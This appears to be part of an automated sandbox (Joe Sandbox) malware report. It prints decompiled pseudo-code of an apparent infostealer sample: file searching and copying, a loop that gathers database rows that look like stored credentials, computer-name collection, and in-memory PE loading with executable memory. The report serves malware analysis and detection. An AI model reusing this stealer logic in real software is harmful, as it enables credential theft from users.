Part of subcall function 0040BF33: StrCmpCA.SHLWAPI(?,00411BF0), ref: 0040BF83
Part of subcall function 0040BF33: StrCmpCA.SHLWAPI(?,00411BF4), ref: 0040BF9D
Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040BFC2
Part of subcall function 0040BF33: StrCmpCA.SHLWAPI(00411BE1,00411BE1), ref: 0040BFD3
Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040BFF0
Part of subcall function 0040BF33: PathMatchSpecA.SHLWAPI(?,?), ref: 0040C013
Part of subcall function 0040BF33: lstrcat.KERNEL32(?), ref: 0040C043
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,00411BE4), ref: 0040C056
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,?), ref: 0040C066
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,00411BE4), ref: 0040C074
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,?), ref: 0040C088
Part of subcall function 0040BF33: CopyFileA.KERNEL32(?,?,00000001), ref: 0040C09E

Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040C000
Part of subcall function 0040BF33: DeleteFileA.KERNEL32(?), ref: 0040C106
Part of subcall function 0040BF33: FindNextFileA.KERNEL32(?,?), ref: 0040C13F
Part of subcall function 0040BF33: FindClose.KERNEL32(?), ref: 0040C150

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 6af9f48885f98858075369bb8a26d1dbafbd27cafe46329ae2be6c20987a9fe5
Instruction ID: bec003cb233a3e6e4c08348c901af8f47412eb6cd72c6f66df56d4856cc191da
Opcode Fuzzy Hash: 6af9f48885f98858075369bb8a26d1dbafbd27cafe46329ae2be6c20987a9fe5
Instruction Fuzzy Hash: 0721427280051DEBCB40EBA4DC46ADDB7BEEF44308F0484A7E605E3261EB359B958F94

Uniqueness

Uniqueness Score: -1.00%

Function 00406736 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 316
stringCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00406736(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, char _a52) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				char _v120;
				char _v132;
				char _v144;
				char _v156;
				char _v168;
				char _v180;
				char _v192;
				char _v204;
				char _v216;
				char _v228;
				char _v240;
				char _v252;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t131;
				signed int _t149;
				void* _t152;
				void* _t165;
				void* _t169;
				void* _t170;
				void* _t187;
				signed int _t240;
				void* _t244;
				void* _t277;
				void* _t292;
				void* _t297;
				void* _t303;
				intOrPtr* _t313;
				void* _t362;
				void* _t363;

				_t292 = __ecx;
				_t313 =  &_v48;
				E004100ED(_t313, __eflags, 0x411be1);
				_t369 = _a48;
				_push( *0x615248);
				_t131 = _t313;
				if(_a48 == 0) {
					E0041018C(E00410208(E004101C6(E00410208(E004101C6(E00410208(E00410208(_t131, _t292,  &_v96, __eflags,  *0x6152f0), _t292,  &_v16, __eflags, 0x411be4), _t292,  &_a28,  &_v32, __eflags), _t292,  &_v72, __eflags, "_"), _t292,  &_a16,  &_v84, __eflags), _t292,  &_v60, __eflags), _t292,  &_v48);
					E00401859(_v60);
					E00401859(_v84);
					E00401859(_v72);
					E00401859(_v32);
					E00401859(_v16);
					_t149 = _v96;
				} else {
					E0041018C(E00410208(E004101C6(E00410208(E00410208(_t131, _t292,  &_v32, _t369,  *0x6152f0), _t292,  &_v72, _t369, 0x411be4), _t292,  &_a28,  &_v84, _t369), _t292,  &_v60, _t369), _t292,  &_v48);
					E00401859(_v60);
					E00401859(_v84);
					E00401859(_v72);
					_t149 = _v32;
				}
				E00401859(_t149);
				_t152 =  *0x6155c0(_a4,  &_v36); // executed
				if(_t152 == 0) {
					_t165 =  *0x61557c(_v36,  *0x61514c, 0xffffffff,  &_v20, _t152); // executed
					_t363 = _t362 + 0x14;
					_t371 = _t165;
					if(_t165 == 0) {
						E004100ED( &_v16, _t371, 0x411be1);
						_t169 =  *0x615598(_v20);
						_pop(_t297);
						_t372 = _t169 - 0x64;
						if(_t169 == 0x64) {
							_t291 = "\n";
							do {
								E004100ED( &_v60, _t372,  *0x6155b4(_v20, 0));
								E004100ED( &_v84, _t372,  *0x6155b4(_v20, 1));
								_t187 =  *0x6155b4(_v20, 2);
								_pop(_t303);
								E004100ED( &_v72, _t372, _t187);
								E0041018C(E00410208( &_v16, _t303,  &_v96, _t372,  *0x6151c0), _t303,  &_v16);
								E00401859(_v96);
								E0041018C(E004101C6( &_v16, _t303,  &_v60,  &_v204, _t372), _t303,  &_v16);
								E00401859(_v204);
								_t49 =  &_v264; // 0x414044
								E0041018C(E00410208( &_v16, _t303, _t49, _t372, "\n"), _t303,  &_v16);
								_t52 =  &_v264; // 0x414044
								E00401859( *_t52);
								E0041018C(E00410208( &_v16, _t303,  &_v120, _t372,  *0x61521c), _t303,  &_v16);
								E00401859(_v120);
								E0041018C(E004101C6( &_v16, _t303,  &_v84,  &_v156, _t372), _t303,  &_v16);
								E00401859(_v156);
								E0041018C(E00410208( &_v16, _t303,  &_v252, _t372, "\n"), _t303,  &_v16);
								E00401859(_v252);
								E0041018C(E00410208( &_v16, _t303,  &_v180, _t372,  *0x6151e0), _t303,  &_v16);
								E00401859(_v180);
								E0041018C(E004101C6( &_v16, _t303,  &_v72,  &_v228, _t372), _t303,  &_v16);
								E00401859(_v228);
								E0041018C(E00410208( &_v16, _t303,  &_v132, _t372, _t291), _t303,  &_v16);
								E00401859(_v132);
								E0041018C(E00410208( &_v16, _t303,  &_v144, _t372,  *0x615168), _t303,  &_v16);
								E00401859(_v144);
								E004100ED( &_v32, _t372, 0x411be1);
								_t240 =  *0x6155a4(_v20, 3, _a40, _a44);
								_t244 = E0040566F(_t240,  &_v192,  *0x6155ac(), _v20, 3);
								_t363 = _t363 + 0x20;
								E0041018C(E004101C6( &_v32, _t303, _t244,  &_v168, _t372), _t303,  &_v32);
								E00401859(_v168);
								E00401859(_v192);
								E0041018C(E004101C6( &_v16, _t303,  &_v32,  &_v216, _t372), _t303,  &_v16);
								E00401859(_v216);
								E0041018C(E00410208( &_v16, _t303,  &_v240, _t372, _t291), _t303,  &_v16);
								E00401859(_v240);
								E0041018C(E00410208( &_v16, _t303,  &_v108, _t372, _t291), _t303,  &_v16);
								E00401859(_v108);
								E00401859(_v32);
								_v32 = _v32 & 0x00000000;
								_v24 = _v24 & 0x00000000;
								E00401859(0);
								E00401859(_v72);
								E00401859(_v84);
								E00401859(_v60);
								_t277 =  *0x615598(_v20);
								_pop(_t297);
							} while (_t277 == 0x64);
						}
						_t170 =  *0x61567c(_v16);
						_t374 = _t170 - 5;
						if(_t170 > 5) {
							_push( *0x61567c(_v16));
							_push(_v16);
							_t364 = _t363 - 0xc;
							E0041011F( &_v48, _t297, _t363 - 0xc, _t374);
							E004016EB( &_a52, _t364 - 0x50);
							_push( &_v108);
							E00403F95(_t297, _t374);
							E00401859(_v108);
						}
						E00401859(_v16);
						E00401859(0);
					}
					 *0x61559c(_v20);
					 *0x6155c4(_v36);
				}
				E00401859(_v48);
				E00401859(0);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				return E004016CC( &_a52);
			}

0x00406736
0x00406748
0x0040674b
0x00406750
0x00406754
0x0040675a
0x0040675c
0x004067fa
0x00406802
0x0040680a
0x00406812
0x0040681a
0x00406822
0x00406827
0x0040675e
0x0040678f
0x00406797
0x0040679f
0x004067a7
0x004067ac
0x004067ac
0x0040682a
0x00406836
0x00406840
0x00406856
0x0040685c
0x0040685f
0x00406861
0x0040686b
0x00406873
0x00406879
0x0040687a
0x0040687d
0x00406883
0x00406888
0x00406899
0x004068af
0x004068b9
0x004068c0
0x004068c5
0x004068de
0x004068e6
0x004068ff
0x0040690a
0x00406910
0x00406921
0x00406926
0x0040692c
0x00406945
0x0040694d
0x00406966
0x00406971
0x00406988
0x00406993
0x004069af
0x004069ba
0x004069d3
0x004069de
0x004069f2
0x004069fa
0x00406a16
0x00406a21
0x00406a2e
0x00406a3e
0x00406a5e
0x00406a65
0x00406a79
0x00406a84
0x00406a8f
0x00406aa7
0x00406ab2
0x00406ac9
0x00406ad4
0x00406ae8
0x00406af0
0x00406af8
0x00406afd
0x00406b01
0x00406b07
0x00406b0f
0x00406b17
0x00406b1f
0x00406b27
0x00406b2d
0x00406b2e
0x00406888
0x00406b3a
0x00406b40
0x00406b43
0x00406b4e
0x00406b4f
0x00406b55
0x00406b5a
0x00406b67
0x00406b6f
0x00406b70
0x00406b7b
0x00406b7b
0x00406b83
0x00406b8a
0x00406b8a
0x00406b92
0x00406b9c
0x00406ba2
0x00406ba6
0x00406bad
0x00406bb5
0x00406bbd
0x00406bc5
0x00406bd6

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 0040566F: memcmp.MSVCRT ref: 0040568D
Part of subcall function 0040566F: memset.MSVCRT ref: 004056BF
Part of subcall function 0040566F: LocalAlloc.KERNEL32(00000040,-000000E1), ref: 004056F5

lstrlen.KERNEL32(?), ref: 00406B3A
lstrlen.KERNEL32(?), ref: 00406B48

Strings

D@A, xrefs: 00406910, 00406926

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmpmemset
String ID: D@A
API String ID: 4023347672-2037432845
Opcode ID: 1d3616dfdbf61291c2b2cc4d239b95cce32b26b48fc74d5eff9cd3e10d120cdf
Instruction ID: 97c6bec238726a123fa41abd0d015c268e963af531a59fe177f9b4b76556e366
Opcode Fuzzy Hash: 1d3616dfdbf61291c2b2cc4d239b95cce32b26b48fc74d5eff9cd3e10d120cdf
Instruction Fuzzy Hash: 84D1B632D00119EBCF10BBA6EC46ACDB775EF00308F51856BF516B7161DB796E868B88

Uniqueness

Uniqueness Score: -1.00%

Function 0040B127 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 89
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040B127(char* _a4, char* _a8) {
				void* _v8;
				void* _v12;
				char _v276;
				char _v596;
				char _v860;
				short _v1380;
				void* _t25;
				intOrPtr* _t27;
				intOrPtr* _t31;
				intOrPtr* _t33;
				intOrPtr* _t35;
				void* _t36;
				intOrPtr* _t37;
				void* _t51;

				 *_a8 = 0;
				_v8 = 0;
				_t25 =  *0x615648(0x411038, 0, 1, 0x411028,  &_v8); // executed
				_t51 = _t25;
				if(_t51 < 0) {
					L6:
					return _t51;
				}
				_t27 = _v8;
				_v12 = 0;
				 *((intOrPtr*)( *_t27))(_t27, 0x411048,  &_v12);
				MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v1380, 0x104);
				_t31 = _v12;
				_t51 =  *((intOrPtr*)( *_t31 + 0x14))(_t31,  &_v1380, 0);
				if(_t51 < 0) {
					goto L6;
				}
				_t33 = _v8;
				_t51 =  *((intOrPtr*)( *_t33 + 0x4c))(_t33, 0, 1);
				if(_t51 < 0) {
					goto L6;
				}
				_t35 = _v8;
				_t36 =  *((intOrPtr*)( *_t35 + 0xc))(_t35,  &_v276, 0x104,  &_v596, 4);
				if(_t36 >= 0) {
					_t37 = _v8;
					_t36 =  *((intOrPtr*)( *_t37 + 0x18))(_t37,  &_v860, 0x104);
					_t51 = _t36;
					if(_t51 >= 0) {
						 *0x6156f0(_a8,  &_v276, 0x104);
						goto L6;
					}
				}
				return _t36;
			}

0x0040b138
0x0040b14b
0x0040b14e
0x0040b154
0x0040b158
0x0040b1fb
0x00000000
0x0040b1fb
0x0040b15e
0x0040b16a
0x0040b170
0x0040b186
0x0040b18c
0x0040b19d
0x0040b1a1
0x00000000
0x00000000
0x0040b1a3
0x0040b1af
0x0040b1b3
0x00000000
0x00000000
0x0040b1b5
0x0040b1cc
0x0040b1d1
0x0040b1d3
0x0040b1e1
0x0040b1e4
0x0040b1e8
0x0040b1f5
0x00000000
0x0040b1f5
0x0040b1e8
0x0040b201

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040B186
lstrcpyn.KERNEL32(0040B326,?,00000104), ref: 0040B1F5

Strings

%s\%s, xrefs: 0040B134

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: ByteCharMultiWidelstrcpyn
String ID: %s\%s
API String ID: 784140127-4073750446
Opcode ID: 8ed9a7cf6fc0da2fa9a2214218f367ee1b277172c473f75e1eee1b317cde452e
Instruction ID: 84cfc8a89258454a4f6356b336cdab385842421c24e8a97c0b093b037cbae230
Opcode Fuzzy Hash: 8ed9a7cf6fc0da2fa9a2214218f367ee1b277172c473f75e1eee1b317cde452e
Instruction Fuzzy Hash: 23313AB5A00218AFCB00DFA4CCC4DEA777DEB88354F1444A9F602EB290D6759E85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00404CD0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404CD0(void* __ecx, void* __esi) {
				char _v8;
				intOrPtr _t22;
				void* _t25;
				void* _t29;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t33;
				char _t35;
				long _t36;
				intOrPtr* _t41;
				intOrPtr _t42;
				signed int _t46;
				void* _t47;

				_t47 = __esi;
				_t22 =  *((intOrPtr*)(__esi + 0x138));
				_t35 = 0;
				_v8 = 0;
				if(0 >=  *(__esi + 0x46)) {
					L8:
					_t10 =  &_v8; // 0x6159e0
					_t36 = _t35 -  *_t10;
					_t11 =  &_v8; // 0x6159e0
					_t25 = VirtualAlloc( *((intOrPtr*)(_t47 + 0x74)) +  *_t11, _t36, 0x3000, 0x40); // executed
					 *(_t47 + 0x148) = _t25;
					 *((intOrPtr*)(_t47 + 0x144)) =  *((intOrPtr*)(_t47 + 0x74));
					if(_t25 != 0) {
						L12:
						asm("sbb eax, eax");
						_t29 = ( ~( *(_t47 + 0x148)) & 0xfffffffd) + 3;
						L13:
						return _t29;
					}
					if(( *(_t47 + 0x56) & 0x00000001) == 0) {
						_t30 = VirtualAlloc(0, _t36, 0x3000, 0x40);
						 *(_t47 + 0x148) = _t30;
						_t19 =  &_v8; // 0x6159e0
						 *((intOrPtr*)(_t47 + 0x144)) = _t30 -  *_t19;
						goto L12;
					}
					_t29 = 4;
					goto L13;
				}
				_t46 =  *(__esi + 0x46) & 0x0000ffff;
				_t41 = _t22 + 0xc;
				do {
					_t42 =  *((intOrPtr*)(_t41 - 4));
					if(_t42 != 0) {
						_t32 =  *_t41;
						_t7 =  &_v8; // 0x6159e0
						if(_t32 <  *_t7) {
							_v8 = _t32;
						}
						_t33 = _t32 + _t42;
						if(_t33 > _t35) {
							_t35 = _t33;
						}
					}
					_t41 = _t41 + 0x28;
					_t46 = _t46 - 1;
				} while (_t46 != 0);
				goto L8;
			}

0x00404cd0
0x00404cd4
0x00404cdb
0x00404ce0
0x00404ce7
0x00404d0f
0x00404d12
0x00404d12
0x00404d15
0x00404d22
0x00404d2b
0x00404d31
0x00404d39
0x00404d61
0x00404d69
0x00404d6e
0x00404d71
0x00404d74
0x00404d74
0x00404d3f
0x00404d4c
0x00404d52
0x00404d58
0x00404d5b
0x00000000
0x00404d5b
0x00404d43
0x00000000
0x00404d43
0x00404ce9
0x00404ced
0x00404cf0
0x00404cf0
0x00404cf5
0x00404cf7
0x00404cf9
0x00404cfc
0x00404cfe
0x00404cfe
0x00404d01
0x00404d05
0x00404d07
0x00404d07
0x00404d05
0x00404d09
0x00404d0c
0x00404d0c
0x00000000

APIs

VirtualAlloc.KERNEL32(Ya,Ya,00003000,00000040,00000000,?,?,?,004050C9,?,006159E0), ref: 00404D22
VirtualAlloc.KERNEL32(00000000,Ya,00003000,00000040,?,004050C9,?,006159E0), ref: 00404D4C

Strings

Ya, xrefs: 00404D12, 00404D15, 00404D58, 00404CF9, 00404D20, 00404D21, 00404D49

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: AllocVirtual
String ID: Ya
API String ID: 4275171209-3053265743
Opcode ID: 1467036af33afe0f12dff532c4fb40a385a77eaccec291986232b889e393395c
Instruction ID: cf722bae0ca74676ce496826712b1a0e4b41243b85f08ec698f7f267ff6837ec
Opcode Fuzzy Hash: 1467036af33afe0f12dff532c4fb40a385a77eaccec291986232b889e393395c
Instruction Fuzzy Hash: 4D11B1B1600B05EBC720CFB4D9D5B9BBBF5EF80714F24442EE60AD73D0E278A9408614

Uniqueness

Uniqueness Score: -1.00%

Function 00403893 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403893(intOrPtr _a4) {
				void* _v8;
				char _v12;
				void* _v16;
				signed int _t20;
				signed int _t22;
				void* _t26;
				signed int _t37;
				signed int _t38;
				signed int _t43;

				_t20 = E0040EE9B(_a4);
				_t47 = _t20;
				_t37 = 3;
				_t43 = _t20 % _t37;
				_t22 = _t20;
				if(_t43 != 0) {
					_t22 = _t22 - _t43 + _t37;
				}
				_t38 = 6;
				_t26 = malloc((_t22 << 3) / _t38 + 1); // executed
				_v8 = _t26;
				E0040188D(_a4, _t47, _t26);
				_v12 = malloc(4);
				E00403310(_v8,  &_v12); // executed
				_v16 =  &_v8;
				memset(_v16, 0, 4 << 0);
				return _v12;
			}

0x0040389e
0x004038a7
0x004038a9
0x004038aa
0x004038ac
0x004038b0
0x004038b4
0x004038b4
0x004038bd
0x004038c8
0x004038d0
0x004038d3
0x004038dc
0x004038e6
0x004038f1
0x004038fe
0x00403906

APIs

malloc.MSVCRT ref: 004038C8
malloc.MSVCRT ref: 004038DA

Strings

1852, xrefs: 0040389C

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: malloc
String ID: 1852
API String ID: 2803490479-692938694
Opcode ID: fb4bc85b311970428aaa9a5ba1eceabd2900f98701c518b96bb51560f74700e1
Instruction ID: 77ee5915d7ecf299f38909f3729e442cd25d548f7373a6988012ec43483171ca
Opcode Fuzzy Hash: fb4bc85b311970428aaa9a5ba1eceabd2900f98701c518b96bb51560f74700e1
Instruction Fuzzy Hash: 1B014872E00108AADB04EBA9DC45ADE7FBADBC4350F14807AB904E3284DE759B118654

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8DF Relevance: 4.5, APIs: 3, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E8DF(void* __ecx) {
				long _v8;
				int _t6;
				CHAR* _t7;
				CHAR* _t10;

				_t10 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v8 = 0x104;
				_t6 = GetComputerNameA(_t10,  &_v8); // executed
				_t7 = 0x411be1;
				if(_t6 != 0) {
					_t7 = _t10;
				}
				return _t7;
			}

0x0040e8f8
0x0040e8ff
0x0040e906
0x0040e90e
0x0040e913
0x0040e915
0x0040e915
0x0040e919

APIs

GetProcessHeap.KERNEL32(00000000,00000104,76636410,?,?,004010B6,0040E259), ref: 0040E8EB
RtlAllocateHeap.NTDLL(00000000), ref: 0040E8F2
GetComputerNameA.KERNEL32(00000000,?), ref: 0040E906

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 63318666f0c43d090fc385e0fc15a94497ce48a7890c655282ac1d8cf83960aa
Instruction ID: f4ac8f7b6c7b2386e962b1ea6d65f3eef08b7e916333e1761a240155d9770943
Opcode Fuzzy Hash: 63318666f0c43d090fc385e0fc15a94497ce48a7890c655282ac1d8cf83960aa
Instruction Fuzzy Hash: 16E0ECB5304208FBDB409BAADC4EEDAB6ADDBC5715F189066B602D62A0E6B4D9408620

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404FE3(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _t17;
				signed int _t19;
				unsigned int _t22;
				int _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t36;
				void* _t40;
				unsigned int* _t43;

				_t40 = __edi;
				_t17 =  *((intOrPtr*)(__edi + 0x138));
				_t36 = 0;
				if(0 >=  *((intOrPtr*)(__edi + 0x46))) {
					L17:
					goto L18;
				} else {
					_t43 = _t17 + 0x24;
					do {
						_t19 =  *_t43;
						if((_t19 & 0x00000020) != 0) {
							 *_t43 = _t19 | 0x60000000;
						}
						_t22 =  *_t43 >> 0x1d;
						if(_t22 == 0) {
							L14:
							_v8 = 2;
						} else {
							_t28 = _t22 - 1;
							if(_t28 == 0) {
								_v8 = 0x10;
								L15:
								_t26 = VirtualProtect( *((intOrPtr*)(_t43 - 0x18)) +  *((intOrPtr*)(_t40 + 0x144)),  *(_t43 - 0x1c), _v8,  &_v8); // executed
								if(_t26 == 0) {
									_push(9);
									_pop(0);
									L18:
									return 0;
								}
								goto L16;
							}
							_t29 = _t28 - 1;
							if(_t29 == 0) {
								goto L14;
							}
							_t30 = _t29 - 1;
							if(_t30 == 0) {
								_v8 = 0x20;
							} else {
								_t31 = _t30 - 1;
								if(_t31 == 0 || _t31 == 0) {
									_v8 = 4;
								} else {
									_v8 = 0x40;
								}
							}
						}
						goto L15;
						L16:
						_t36 = _t36 + 1;
						_t43 =  &(_t43[0xa]);
					} while (_t36 < ( *(_t40 + 0x46) & 0x0000ffff));
					goto L17;
				}
			}

0x00404fe3
0x00404fe7
0x00404ff0
0x00404ff7
0x00405078
0x00000000
0x00404ff9
0x00404ff9
0x00404ffc
0x00404ffc
0x00405000
0x00405007
0x00405007
0x0040500e
0x00405011
0x00405047
0x00405047
0x00405013
0x00405013
0x00405014
0x0040503e
0x0040504e
0x00405062
0x0040506a
0x0040507e
0x00405080
0x0040507a
0x0040507d
0x0040507d
0x00000000
0x0040506a
0x00405016
0x00405017
0x00000000
0x00000000
0x00405019
0x0040501a
0x00405035
0x0040501c
0x0040501c
0x0040501d
0x0040502c
0x00405023
0x00405023
0x00405023
0x0040501d
0x0040501a
0x00000000
0x0040506c
0x00405070
0x00405071
0x00405074
0x00000000
0x00404ffc

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00405107), ref: 00405062

Strings

, xrefs: 00405035

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 120f9e235027a84a652f7cb420957499fd80886b6536de8c320b8f57493955ce
Instruction ID: 82a0b167bfc8f1ef9114ab50e1277d25523b3b61928097229c11e2f2034efd86
Opcode Fuzzy Hash: 120f9e235027a84a652f7cb420957499fd80886b6536de8c320b8f57493955ce
